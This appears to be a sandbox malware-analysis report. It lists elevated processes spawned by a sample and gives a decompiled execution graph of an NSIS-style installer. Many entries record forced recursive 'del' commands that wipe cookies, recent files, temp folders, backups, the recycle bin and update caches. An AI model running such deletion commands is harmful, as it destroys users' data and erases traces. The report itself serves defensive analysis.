                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:44
                                                                                            Start time:03:02:08
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:45
                                                                                            Start time:03:02:08
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:48
                                                                                            Start time:03:02:56
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:49
                                                                                            Start time:03:02:56
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:50
                                                                                            Start time:03:02:56
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:51
                                                                                            Start time:03:02:56
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:52
                                                                                            Start time:03:02:56
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:53
                                                                                            Start time:03:02:56
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:54
                                                                                            Start time:03:02:56
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:55
                                                                                            Start time:03:02:56
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:56
                                                                                            Start time:03:02:56
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:57
                                                                                            Start time:03:02:56
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:58
                                                                                            Start time:03:02:56
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:59
                                                                                            Start time:03:02:56
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:60
                                                                                            Start time:03:02:56
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:61
                                                                                            Start time:03:02:57
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:62
                                                                                            Start time:03:02:57
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:63
                                                                                            Start time:03:02:57
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:64
                                                                                            Start time:03:03:17
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:65
                                                                                            Start time:03:03:17
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:66
                                                                                            Start time:03:03:17
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:67
                                                                                            Start time:03:03:17
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:68
                                                                                            Start time:03:03:17
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:69
                                                                                            Start time:03:03:18
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:70
                                                                                            Start time:03:03:18
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:71
                                                                                            Start time:03:03:18
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:72
                                                                                            Start time:03:03:18
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:73
                                                                                            Start time:03:03:18
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:74
                                                                                            Start time:03:03:18
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:75
                                                                                            Start time:03:03:18
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:76
                                                                                            Start time:03:03:18
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:77
                                                                                            Start time:03:03:18
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:78
                                                                                            Start time:03:03:18
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:79
                                                                                            Start time:03:03:18
                                                                                            Start date:23/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:11.9%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:23%
                                                                                              Total number of Nodes:1226
                                                                                              Total number of Limit Nodes:22
                                                                                              execution_graph 2877 401dc1 2889 4029f6 2877->2889 2880 4029f6 18 API calls 2881 401dd0 2880->2881 2882 4029f6 18 API calls 2881->2882 2883 401dd9 2882->2883 2884 4029f6 18 API calls 2883->2884 2885 401de2 2884->2885 2895 401423 2885->2895 2888 401e16 2890 402a02 2889->2890 2898 4059ff 2890->2898 2893 401dc7 2893->2880 2938 404d7b 2895->2938 2910 405a0c 2898->2910 2899 405c26 2900 402a23 2899->2900 2933 4059dd lstrcpynA 2899->2933 2900->2893 2917 405c3f 2900->2917 2902 405aa4 GetVersion 2913 405ab1 2902->2913 2903 405bfd lstrlenA 2903->2910 2906 4059ff 10 API calls 2906->2903 2908 405b1c GetSystemDirectoryA 2908->2913 2909 405b2f GetWindowsDirectoryA 2909->2913 2910->2899 2910->2902 2910->2903 2910->2906 2911 405c3f 5 API calls 2910->2911 2931 40593b wsprintfA 2910->2931 2932 4059dd lstrcpynA 2910->2932 2911->2910 2912 405b63 SHGetSpecialFolderLocation 2912->2913 2916 405b7b SHGetPathFromIDListA CoTaskMemFree 2912->2916 2913->2908 2913->2909 2913->2910 2913->2912 2914 4059ff 10 API calls 2913->2914 2915 405ba6 lstrcatA 2913->2915 2926 4058c4 RegOpenKeyExA 2913->2926 2914->2913 2915->2910 2916->2913 2918 405c4b 2917->2918 2920 405cb3 2918->2920 2921 405ca8 CharNextA 2918->2921 2924 405c96 CharNextA 2918->2924 2925 405ca3 CharNextA 2918->2925 2934 4054fb 2918->2934 2919 405cb7 CharPrevA 2919->2920 2920->2919 2922 405cd2 2920->2922 2921->2918 2921->2920 2922->2893 2924->2918 2925->2921 2927 405935 2926->2927 2928 4058f7 RegQueryValueExA 2926->2928 2927->2913 2929 405918 RegCloseKey 2928->2929 2929->2927 2931->2910 2932->2910 2933->2900 2935 405501 2934->2935 2936 405514 2935->2936 2937 405507 CharNextA 2935->2937 2936->2918 2937->2935 2939 404d96 2938->2939 2948 401431 ShellExecuteA 2938->2948 2940 404db3 lstrlenA 2939->2940 2941 4059ff 18 API calls 2939->2941 2942 404dc1 lstrlenA 2940->2942 2943 404ddc 2940->2943 2941->2940 2944 404dd3 lstrcatA 2942->2944 2942->2948 2945 404de2 SetWindowTextA 2943->2945 2946 404def 2943->2946 2944->2943 2945->2946 2947 404df5 SendMessageA SendMessageA SendMessageA 2946->2947 2946->2948 2947->2948 2948->2888 3398 401cc1 GetDlgItem GetClientRect 3399 4029f6 18 API calls 3398->3399 3400 401cf1 LoadImageA SendMessageA 3399->3400 3401 401d0f DeleteObject 3400->3401 3402 40288b 3400->3402 3401->3402 3403 401645 3404 4029f6 18 API calls 3403->3404 3405 40164c 3404->3405 3406 4029f6 18 API calls 3405->3406 3407 401655 3406->3407 3408 4029f6 18 API calls 3407->3408 3409 40165e MoveFileA 3408->3409 3410 401671 3409->3410 3411 40166a 3409->3411 3412 405cd8 2 API calls 3410->3412 3415 402169 3410->3415 3413 401423 25 API calls 3411->3413 3414 401680 3412->3414 3413->3415 3414->3415 3416 40572b 38 API calls 3414->3416 3416->3411 3417 401ec5 3418 4029f6 18 API calls 3417->3418 3419 401ecc GetFileVersionInfoSizeA 3418->3419 3420 401eef GlobalAlloc 3419->3420 3423 401f45 3419->3423 3421 401f03 GetFileVersionInfoA 3420->3421 3420->3423 3422 401f14 VerQueryValueA 3421->3422 3421->3423 3422->3423 3424 401f2d 3422->3424 3428 40593b wsprintfA 3424->3428 3426 401f39 3429 40593b wsprintfA 3426->3429 3428->3426 3429->3423 3437 4046ca GetDlgItem GetDlgItem 3438 40471e 7 API calls 3437->3438 3451 40493b 3437->3451 3439 4047c4 DeleteObject 3438->3439 3440 4047b7 SendMessageA 3438->3440 3441 4047cf 3439->3441 3440->3439 3443 404806 3441->3443 3445 4059ff 18 API calls 3441->3445 3442 404a25 3444 404ad4 3442->3444 3447 40492e 3442->3447 3453 404a7e SendMessageA 3442->3453 3488 403d8f 3443->3488 3448 404ae9 3444->3448 3449 404add SendMessageA 3444->3449 3450 4047e8 SendMessageA SendMessageA 3445->3450 3506 403df6 3447->3506 3461 404b02 3448->3461 3462 404afb ImageList_Destroy 3448->3462 3466 404b12 3448->3466 3449->3448 3450->3441 3451->3442 3469 4049af 3451->3469 3493 40464a SendMessageA 3451->3493 3452 40481a 3457 403d8f 19 API calls 3452->3457 3453->3447 3459 404a93 SendMessageA 3453->3459 3455 404a17 SendMessageA 3455->3442 3470 404828 3457->3470 3458 404c78 3458->3447 3467 404c8a ShowWindow GetDlgItem ShowWindow 3458->3467 3464 404aa6 3459->3464 3465 404b0b GlobalFree 3461->3465 3461->3466 3462->3461 3463 4048fc GetWindowLongA SetWindowLongA 3468 404915 3463->3468 3476 404ab7 SendMessageA 3464->3476 3465->3466 3466->3458 3475 40140b 2 API calls 3466->3475 3481 404b44 3466->3481 3467->3447 3471 404933 3468->3471 3472 40491b ShowWindow 3468->3472 3469->3442 3469->3455 3470->3463 3474 404877 SendMessageA 3470->3474 3477 4048f6 3470->3477 3479 4048b3 SendMessageA 3470->3479 3480 4048c4 SendMessageA 3470->3480 3492 403dc4 SendMessageA 3471->3492 3491 403dc4 SendMessageA 3472->3491 3474->3470 3475->3481 3476->3444 3477->3463 3477->3468 3479->3470 3480->3470 3482 404b88 3481->3482 3485 404b72 SendMessageA 3481->3485 3483 404c4e InvalidateRect 3482->3483 3487 404bfc SendMessageA SendMessageA 3482->3487 3483->3458 3484 404c64 3483->3484 3498 404568 3484->3498 3485->3482 3487->3482 3489 4059ff 18 API calls 3488->3489 3490 403d9a SetDlgItemTextA 3489->3490 3490->3452 3491->3447 3492->3451 3494 4046a9 SendMessageA 3493->3494 3495 40466d GetMessagePos ScreenToClient SendMessageA 3493->3495 3496 4046a1 3494->3496 3495->3496 3497 4046a6 3495->3497 3496->3469 3497->3494 3499 404582 3498->3499 3500 4059ff 18 API calls 3499->3500 3501 4045b7 3500->3501 3502 4059ff 18 API calls 3501->3502 3503 4045c2 3502->3503 3504 4059ff 18 API calls 3503->3504 3505 4045f3 lstrlenA wsprintfA SetDlgItemTextA 3504->3505 3505->3458 3507 403e0e GetWindowLongA 3506->3507 3517 403e97 3506->3517 3508 403e1f 3507->3508 3507->3517 3509 403e31 3508->3509 3510 403e2e GetSysColor 3508->3510 3511 403e41 SetBkMode 3509->3511 3512 403e37 SetTextColor 3509->3512 3510->3509 3513 403e59 GetSysColor 3511->3513 3514 403e5f 3511->3514 3512->3511 3513->3514 3515 403e70 3514->3515 3516 403e66 SetBkColor 3514->3516 3515->3517 3518 403e83 DeleteObject 3515->3518 3519 403e8a CreateBrushIndirect 3515->3519 3516->3515 3518->3519 3519->3517 3065 4030cb #17 SetErrorMode OleInitialize 3135 405cff GetModuleHandleA 3065->3135 3069 403139 GetCommandLineA 3140 4059dd lstrcpynA 3069->3140 3071 40314b GetModuleHandleA 3072 403162 3071->3072 3073 4054fb CharNextA 3072->3073 3074 403176 CharNextA 3073->3074 3080 403183 3074->3080 3075 4031ec 3076 4031ff GetTempPathA 3075->3076 3141 403097 3076->3141 3078 403215 3081 403239 DeleteFileA 3078->3081 3082 403219 GetWindowsDirectoryA lstrcatA 3078->3082 3079 4054fb CharNextA 3079->3080 3080->3075 3080->3079 3086 4031ee 3080->3086 3149 402c22 GetTickCount GetModuleFileNameA 3081->3149 3084 403097 11 API calls 3082->3084 3085 403235 3084->3085 3085->3081 3088 4032b7 ExitProcess CoUninitialize 3085->3088 3232 4059dd lstrcpynA 3086->3232 3087 40324a 3087->3088 3090 4032a3 3087->3090 3095 4054fb CharNextA 3087->3095 3091 4033b1 3088->3091 3092 4032cc 3088->3092 3177 403526 3090->3177 3093 403434 ExitProcess 3091->3093 3097 405cff 3 API calls 3091->3097 3096 40529e MessageBoxIndirectA 3092->3096 3100 403261 3095->3100 3101 4032da ExitProcess 3096->3101 3102 4033c0 3097->3102 3105 4032e2 lstrcatA lstrcmpiA 3100->3105 3106 40327e 3100->3106 3103 405cff 3 API calls 3102->3103 3104 4033c9 3103->3104 3107 405cff 3 API calls 3104->3107 3105->3088 3108 4032fe CreateDirectoryA SetCurrentDirectoryA 3105->3108 3233 4055b1 3106->3233 3110 4033d2 3107->3110 3111 403320 3108->3111 3112 403315 3108->3112 3115 403420 ExitWindowsEx 3110->3115 3121 4033e0 GetCurrentProcess 3110->3121 3251 4059dd lstrcpynA 3111->3251 3250 4059dd lstrcpynA 3112->3250 3115->3093 3118 40342d 3115->3118 3281 40140b 3118->3281 3119 403298 3249 4059dd lstrcpynA 3119->3249 3125 4033f0 3121->3125 3123 4059ff 18 API calls 3124 403350 DeleteFileA 3123->3124 3126 40335d CopyFileA 3124->3126 3132 40332e 3124->3132 3125->3115 3126->3132 3127 4033a5 3128 40572b 38 API calls 3127->3128 3130 4033ac 3128->3130 3130->3088 3131 4059ff 18 API calls 3131->3132 3132->3123 3132->3127 3132->3131 3134 403391 CloseHandle 3132->3134 3252 40572b 3132->3252 3278 40523d CreateProcessA 3132->3278 3134->3132 3136 405d26 GetProcAddress 3135->3136 3137 405d1b LoadLibraryA 3135->3137 3138 40310e SHGetFileInfoA 3136->3138 3137->3136 3137->3138 3139 4059dd lstrcpynA 3138->3139 3139->3069 3140->3071 3142 405c3f 5 API calls 3141->3142 3143 4030a3 3142->3143 3144 4030ad 3143->3144 3145 4054d0 3 API calls 3143->3145 